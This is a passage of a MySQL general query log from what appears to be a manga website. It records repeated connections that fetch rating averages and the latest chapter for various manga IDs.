u317079482_mangacherri_2 using Socket 330656716 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330656716 Quit 330656717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656717 Query select * FROM chapters where manga_id = '385' order by created desc limit 1 330656717 Quit 330656718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656718 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330656718 Quit 330656719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656719 Query select * FROM chapters where manga_id = '384' order by created desc limit 1 330656719 Quit 330656720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330656720 Quit 330656721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656721 Query select * FROM chapters where manga_id = '382' order by created desc limit 1 330656721 Quit 330656722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330656722 Quit 330656723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656723 Query select * FROM chapters where manga_id = '80' order by created desc limit 1 330656723 Quit 330656724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330656724 Quit 330656725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656725 Query select * FROM chapters where manga_id = '377' order by created desc limit 1 330656725 Quit 330656726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330656726 Quit 330656727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656727 Query select * FROM chapters where manga_id = '390' order by created desc limit 1 330656727 Quit 330656728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330656728 Quit 330656729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656729 Query select * FROM chapters where manga_id = '327' order by created desc limit 1 330656729 Quit 330656730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330656730 Quit 330656731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656731 Query select * FROM chapters where manga_id = '376' order by created desc limit 1 260225 19:29:47 330656731 Quit 330656732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330656732 Quit 330656733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656733 Query select * FROM chapters where manga_id = '373' order by created desc limit 1 330656733 Quit 330656734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330656734 Quit 330656735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656735 Query select * FROM chapters where manga_id = '388' order by created desc limit 1 330656735 Quit 330656736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330656736 Quit 330656737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656737 Query select * FROM chapters where manga_id = '173' order by created desc limit 1 330656737 Quit 330656738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330656738 Quit 330656739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656739 Query select * FROM chapters where manga_id = '35' order by created desc limit 1 330656739 Quit 330656740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330656740 Quit 330656741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656741 Query select * FROM chapters where manga_id = '296' order by created desc limit 1 330656741 Quit 330656742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330656742 Quit 330656743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656743 Query select * FROM chapters where manga_id = '22' order by created desc limit 1 330656743 Quit 330656744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330656744 Quit 330656745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656745 Query select * FROM chapters where manga_id = '83' order by created desc limit 1 330656745 Quit 330656746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330656746 Quit 330656747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656747 Query select * FROM chapters where manga_id = '346' order by created desc limit 1 330656747 Quit 330656748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330656748 Quit 330656749 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656749 Query select * FROM chapters where manga_id = '240' order by created desc limit 1 330656749 Quit 330656750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330656750 Quit 330656751 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656751 Query select * FROM chapters where manga_id = '50' order by created desc limit 1 330656751 Quit 330656752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330656752 Quit 330656753 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656753 Query select * FROM chapters where manga_id = '27' order by created desc limit 1 330656753 Quit 330656754 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330656754 Quit 330656755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656755 Query select * FROM chapters where manga_id = '92' order by created desc limit 1 330656755 Quit 330656756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330656756 Quit 330656757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656757 Query select * FROM chapters where manga_id = '289' order by created desc limit 1 330656757 Quit 330656758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330656758 Quit 330656759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330656759 Quit 330656760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330656760 Quit 330656761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330656761 Quit 330656762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330656762 Quit 330656763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330656763 Quit 330656764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330656764 Quit 330656765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330656765 Quit 330656766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330656766 Quit 330656767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330656767 Quit 330656768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330656768 Quit 330656769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330656769 Quit 330656770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330656770 Quit 330656771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330656771 Quit 330656772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330656772 Quit 330656773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330656773 Quit 330656774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330656774 Quit 330656775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330656775 Quit 330656776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330656776 Quit 330656777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330656777 Quit 330656778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330656778 Quit 330656779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330656779 Quit 330656780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330656780 Quit 330656781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330656781 Quit 330656782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330656782 Quit 330656783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330656783 Quit 330656784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330656784 Quit 330656785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330656785 Quit 330656786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330656786 Quit 330656787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330656787 Quit 330656788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330656788 Quit 330656789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330656789 Quit 330656790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330656790 Quit 330656791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330656791 Quit 330656792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330656792 Quit 330656793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330656793 Quit 330656794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330656794 Quit 330656795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330656795 Quit 330656796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330656796 Quit 330656797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330656797 Quit 330656798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330656798 Quit 330656799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330656799 Quit 330656800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330656800 Quit 330656801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330656801 Quit 330656802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330656802 Quit 330656803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330656803 Quit 330656804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330656804 Quit 330656805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330656805 Quit 330656806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330656806 Quit 330656807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330656807 Quit 330656808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330656808 Quit 330656809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330656809 Quit 330656810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330656810 Quit 330656811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330656811 Quit 330656812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330656812 Quit 330656813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330656813 Quit 330656814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330656814 Quit 330656815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330656815 Quit 330656816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330656816 Quit 330656817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330656817 Quit 330656818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330656818 Quit 330656819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330656819 Quit 330656820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330656820 Quit 330656821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330656821 Quit 330656822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330656822 Quit 330656823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330656823 Quit 330656824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330656824 Quit 330656825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330656825 Quit 330656826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330656826 Quit 330656827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330656827 Quit 330656828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330656828 Quit 330656829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330656829 Quit 330656830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330656830 Quit 330656831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330656831 Quit 330656832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330656832 Quit 330656833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330656833 Quit 330656834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330656834 Quit 330656835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330656835 Quit 330656836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330656836 Quit 330656837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330656837 Quit 330656838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330656838 Quit 330656839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330656839 Quit 330656840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330656840 Quit 330656841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330656841 Quit 330656842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330656842 Quit 330656843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330656843 Quit 330656844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330656844 Quit 330656845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330656845 Quit 330656846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330656846 Quit 330656847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330656847 Quit 330656848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330656848 Quit 330656849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330656849 Quit 330656850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330656850 Quit 330656851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330656851 Quit 330656852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330656852 Quit 330656853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330656853 Quit 330656854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330656854 Quit 330656855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330656855 Quit 330656856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330656856 Quit 330656857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330656857 Quit 330656858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330656858 Quit 330656859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330656859 Quit 330656860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330656860 Quit 330656861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330656861 Quit 330656862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330656862 Quit 330656863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330656863 Quit 330656864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330656864 Quit 330656865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330656865 Quit 330656866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330656866 Quit 330656867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330656867 Quit 330656868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330656868 Quit 330656869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330656869 Quit 330656870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330656870 Quit 330656871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330656871 Quit 330656872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330656872 Quit 330656873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330656873 Quit 330656874 